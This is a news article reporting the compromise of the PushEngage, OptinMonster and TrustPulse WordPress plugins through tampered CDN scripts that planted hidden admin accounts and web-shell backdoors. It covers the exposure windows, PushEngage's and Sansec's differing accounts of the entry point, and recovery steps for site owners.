Critical WordPress Plugins Compromised: Millions of Sites Exposed to Hidden Backdoors
A sophisticated cyberattack has targeted widely used WordPress plugins, including PushEngage, OptinMonster, and TrustPulse, by injecting malicious code into their trusted JavaScript files. This breach allowed attackers to create hidden administrative accounts and install persistent backdoors on affected websites, posing a significant threat to over a million WordPress installations.
The Anatomy of the Attack: How Backdoors Were Planted
The attackers cleverly designed their malicious script to activate only when a logged-in WordPress administrator accessed a compromised site. Upon execution, the script leveraged the administrator’s session to:
- Create a new, attacker-controlled administrative account.
- Install a stealthy plugin designed to remain invisible within the WordPress dashboard.
- Transmit the new login credentials and site information to a fake domain, tidio[.]cc, mimicking the legitimate tidio.com.
This method ensured that ordinary site visitors remained unaffected, making the breach particularly insidious as it targeted the very individuals responsible for site security. The hidden plugin, once installed, established a “web shell” – a remote command channel allowing the attacker to execute arbitrary code on the server without needing to log in. This grants them full control, enabling data theft, further backdoor installation, content manipulation, or even credit card skimming.
Security firm Sansec, which first unveiled the broader campaign on June 13, confirmed the presence of this malicious code across all three plugins. PushEngage later issued its own incident notice, corroborating the attack and warning users of potential site compromise. The registration of the tidio[.]cc domain weeks before the attack suggests a pre-meditated, well-orchestrated operation rather than an opportunistic strike.
The Scale and Scope of the Compromise
All three affected plugins are under the umbrella of Awesome Motive. While PushEngage, acquired by Awesome Motive years ago, was the first to provide official guidance, users of OptinMonster and TrustPulse initially received no direct communication, raising concerns within the community.
The exposure window varied significantly:
- OptinMonster and TrustPulse: Malicious code was active for approximately 25 minutes on June 12 (22:17 UTC to 22:42 UTC).
- PushEngage: The exposure was more prolonged, lasting several hours on June 12, with tampered scripts still being served from some CDN servers into June 14.
Despite the shorter window for OptinMonster and TrustPulse, these plugins boast a massive user base. Sansec estimates that collectively, the three plugins reach over 1.2 million sites, with OptinMonster alone accounting for more than a million active installations. PushEngage’s WordPress plugin has over 9,000 installs. It’s crucial to note that these figures represent the
reach of the plugins, not necessarily the number of sites actually compromised, though any site that loaded the malicious script while an admin was logged in should be considered compromised.
The Entry Point: A Disputed Narrative
The precise method by which the attackers gained initial access remains a point of contention between PushEngage and Sansec.
- PushEngage’s Account:
The company suggests the attacker first breached its marketing website server, exploiting a known vulnerability in the UpdraftPlus WordPress backup plugin. Crucially, this server, though separate from core product systems, contained a CDN API key. This key allowed the attacker to manipulate the JavaScript files delivered via the Content Delivery Network (CDN) to customer sites without directly compromising PushEngage’s main infrastructure.
- Sansec’s Perspective: Sansec remains unconvinced about the definitive entry point. While acknowledging the possibility of a CDN account compromise, they lean towards Awesome Motive’s own servers as the most likely breached system, deeming the CDN provider (BunnyNet) an improbable vector. Sansec’s public analysis does not validate the UpdraftPlus theory, which PushEngage provided solely regarding its own environment.
It’s worth noting that UpdraftPlus did have a separate, high-severity authentication-bypass bug (CVE-2026-10795), which has since been patched. Wordfence has reported active attacks against this vulnerability, underscoring the importance of keeping all plugins updated.
Immediate Actions for Affected Sites
Given the nature of the backdoor, simply removing the visible malicious plugin or the newly created admin account may not be sufficient. Both Sansec and PushEngage strongly advise treating any potentially affected site as fully compromised. This means:
- Full Audit: Conduct a thorough security audit of your server and database.
- Clean Installation: Consider a clean installation from a known good backup, followed by a complete password reset for all users.
- Vigilance: Monitor for any unusual activity or new files on your server.
- Update Everything: Ensure all WordPress core files, themes, and plugins (especially UpdraftPlus, if used) are updated to their latest versions.
This incident serves as a stark reminder of the critical importance of robust security practices and continuous vigilance in the WordPress ecosystem.
For more details, visit our website.
Source: Link
Leave a comment